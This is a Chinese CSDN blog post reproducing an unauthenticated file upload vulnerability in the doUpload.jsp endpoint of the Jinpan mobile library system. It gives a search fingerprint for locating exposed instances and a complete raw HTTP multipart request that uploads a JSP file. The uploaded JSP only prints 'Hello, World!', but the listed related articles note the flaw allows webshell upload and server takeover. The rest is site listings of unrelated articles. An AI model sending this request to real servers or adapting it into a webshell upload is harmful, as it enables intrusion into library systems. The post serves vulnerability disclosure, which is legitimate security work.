金盘移动图书管理系统doUpload.jsp接口存在文件上传漏洞

最新推荐文章于 2024-08-16 23:08:28 发布
最新推荐文章于 2024-08-16 23:08:28 发布
阅读量364 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: java 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waxcj/article/details/135875520
版权
该篇文章描述了一次针对金盘软件-金盘移动图书馆系统的漏洞复现,涉及POST请求到/admin/tools/uploadFile/doUpload.jsp,攻击者可能利用此漏洞上传恶意代码,如test.jsp,暗示可能存在安全风险。
摘要由CSDN通过智能技术生成

指纹特征

app="金盘软件-金盘移动图书馆系统"

漏洞复现

POST /pages/admin/tools/uploadFile/doUpload.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=738AA10BD1F0362BACD288A1EAE08B34
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
Content-Length: 186

------WebKitFormBoundary5iALAXlSiqxJXrhK
Content-Disposition: form-data; name="file";filename="test.jsp"

<% out.println("Hello, World!"); %>
------WebKitFormBoundary5iALAXlSiqxJXrhK--

在这里插入图片描述

LZsec
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
金盘移动图书馆系统 doUpload RCE漏洞复现
0xSec
01-25 620
金盘移动图书馆系统 doUpload.jsp接口存在文件上传漏洞,未经身份验证的攻击者可以利用此漏洞上传webshell,执行恶意代码指令,导致服务器失陷。
node.js文件上传重命名以及移动位置的示例代码
12-23
一个关于node上传文件的例子,下面是前端代码, doUpload() { var formData = new FormData($("#uploadForm")[0]); $.ajax({ url: 'http://localhost:3011/upload', type: 'POST', data: formData, async: ...
[未公开0day]金盘移动图书馆系统-文件上传漏洞
LiangYueSec的博客
06-21 606
[未公开0day]金盘移动图书馆系统-文件上传漏洞
漏洞复现】金盘图书馆系统-doupload-任意文件上传
知黑而守白
01-25 161
金盘移动图书馆管理系统是集掌上门户,掌上APP,微信平台为一体的移动服务解决方案,在移动智能时代拉近读者与图书馆之间的距离。其存在信息泄露漏洞,泄露管理员账号密码等敏感信息。金盘移动图书馆管理系统 doUpload 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
金盘移动图书管理系统存在文件上传漏洞-1day未公开漏洞
weixin_43167326的博客
01-29 414
金盘移动图书管理系统是一个用于图书馆管理的软件系统。存在文件上传漏洞,攻击者可能会利用这个漏洞上传恶意文件,进而控制服务器或窃取敏感数据。。
金盘移动图书馆系统 RCE漏洞-1day未公开漏洞复现
weixin_43167326的博客
02-01 568
金盘移动图书馆系统是金盘软件为图书馆和阅读者提供便捷服务的软件系统,可管理图书、提供借阅和归还功能,以及提供阅读者个人信息管理和图书检索服务。金盘移动图书馆系统 doUpload.jsp接口存在文件上传漏洞,恶意攻击者可利用此问题,上传后门文件,获取服务器权限。
Vue.Js及Java实现文件分片上传代码实例
10-15
在本文中,我们将深入探讨如何使用Vue.js和Java实现文件分片上传的代码实例。...通过以上步骤,我们可以构建一个完整的文件分片上传系统,有效地处理大文件上传,提高用户体验,并降低网络问题对上传成功率的影响。
JSP上传文件[文].pdf
10-19
在部分内容中,我们可以看到一个简单的JSP文件上传示例,该示例由两个部分组成:UploadExample.jsp 和 doUpload.jsp。 1. UploadExample.jsp是用户界面,提供了文件上传的表单,这个表单包含了以下知识点: - `;...
简单的JSP文件上传.txt
10-19
根据提供的`UploadExample.jsp`和`doUpload.jsp`两个文件的内容,我们可以了解到整个文件上传的过程。 ##### 1. 上传表单(UploadExample.jsp) ```jsp ;charset=gb2312" %> <title><%=application.getServerInfo...
JAVA进阶补充
2301_80150315的博客
08-15 879
概念:把已经有的方法拿过来用,当作函数式接口中抽象方法的方法体条件:引用处必须是函数式接口被引用的方法需要已经存在被引用方法的形参和返回值需要跟抽象方法的形参和返回值保持一致被引用方法的功能需要满足当前需求:方法引用符意义:就是为让控制台的报错信息更加的见名知意自定义异常的步骤:定义异常类写继承关系空参构造带参构造​file对象就表示一个路径,可以是文件的路径、也可以是文件夹的路径;这个路径可以是存在的,也允许是不存在的构造方法描述根据文件路径创建对象。
进程间通信 ---共享内存
BUG制造机的博客
08-14 1043
在这篇文章中向大家介绍了共享内存的原理以及常用的指令函数,希望大家有所收获!😁。
手撕快排——三种实现方法(附动图及源码)
最新发布
jsjs1346的博客
08-16 570
🤖💻👨‍💻👩‍💻🌟🚀🤖🌟👨‍💻👩‍💻👨‍💻👩‍💻🚀是一种高效的排序算法,广泛应用于各种场景。它采用策略,将一个数组分成两个子数组,然后递归地对这两个子数组进行排序。本文将介绍三种快速排序的实现方法,并附上相应的源码。⚙️一、快速排序的基本原理一个基准元素(pivot)分成两个子数组递归合并O(n log n)O(n log n)O(n^2)后文我们将给出优化方案O(log n)📚三、实现霍尔方法是快速排序原始版本中使用的分区方法。
Java Spring|day3.SpringBoot
weixin_60364343的博客
08-15 350
告诉Spring boot需要什么功能,它就能引入需要的依赖库起步依赖就是特殊的Maven依赖,利用了传递依赖解析,把常用库聚合在一起,组成几个为特定功能而定制的依赖。
旅游网站
weixin_43213064的博客
08-16 639
【代码】springboot旅游网站
构造方法,JavaBean,对象内存图,基础数据类型和引用数据类型
qq_63126439的博客
08-14 289
栈内存处理完数据之后会退出,指向推内存的箭头都会消失,当没有人指向他的时候,堆内存中的数据也会被移除。带参构造方法和无参数构造方法,两者方法名相同,但参数不同,这叫做构造方法的重载。方法区,新增元空间,把原来的方法区的多种功能进行了拆分。创造对象的时候,虚拟机会自动调用构造方法,作用是给成员变量进行初始化的。只要是看见new就会在堆内存创建新的空间,两个空间是独立的,互不影响。基础数据类型,在变量当中存储真实的数据值,和其他空间没有任何关系。使用其他空间的数值,自己的空间存储的是地址值。
基于JAVA生产制造执行系统设计与实现(源码+论文+讲解等)
程序员阿龙的博客
08-13 1072
当下,如果 还依然使用纸质文档来记录并且管理相关信息,可能会出现很多问题,比如原始文件的丢失,因为采用纸质文档,很容易受潮或者怕火,不容易备份,需要花费大量的人员和资金来管理用纸质文档存储的信息,最重要的是数据出现问题寻找起来很麻烦,并且修改也困难,如果还这样操作会造成很大的资源浪费和经济损失。所以,对于本课题研究的产品生产制造信息的管理就需要有一款软件来代替手工操作,因此MES生产制造执行系统就应运而生。MES生产制造执行系统运用的工具包括Eclipse,Tomcat以及Navicat等。
总结常见报错信息
m0_68903702的博客
08-16 165
在@Controller注解中,返回的是字符串或者是字符串匹配的模板名称,即直接渲染视图,与html页面配合使用的,java后端的代码要结合html的情况进行渲染,使用model对象(或者modelandview)的数据将填充user视图中的相关属性,然后展示到浏览器;而在@RestController中,返回的应该是一个对象,即return一个user对象,这时,在没有页面的情况下,也能看到返回的是一个user对象对应的json字符串。情形一:若前端传入Json格式,后端使用。
基于vue框架的爱看电影网站v4o92(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
08-15 962
项目功能:用户,电影分类,电影信息,电影评分基于Vue框架的爱看电影网站项目功能丰富多样,旨在为用户提供一个集电影浏览、信息查询、观影体验、互动交流于一体的综合性平台。
从springBoot框架服务器上下载文件 自定义一个启动器
weixin_45939821的博客
08-14 262
一:所有启动器配置类的创建使用spring-boot-autoconfigure实现二:spring-boot-configuration-processor找到boot的配置文件实现映射.<parent></parent>
SpringBoot使用MultipartFile类上传文件,@Async异步处理报文件不存在异常
03-28
可能是因为异步处理方法执行时,上传文件的流已经关闭了,导致文件不存在异常。可以将上传文件的流传递到异步处理方法中,或者使用Spring的TaskExecutor来异步处理文件上传。具体实现方法可以参考以下代码: ``` @...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值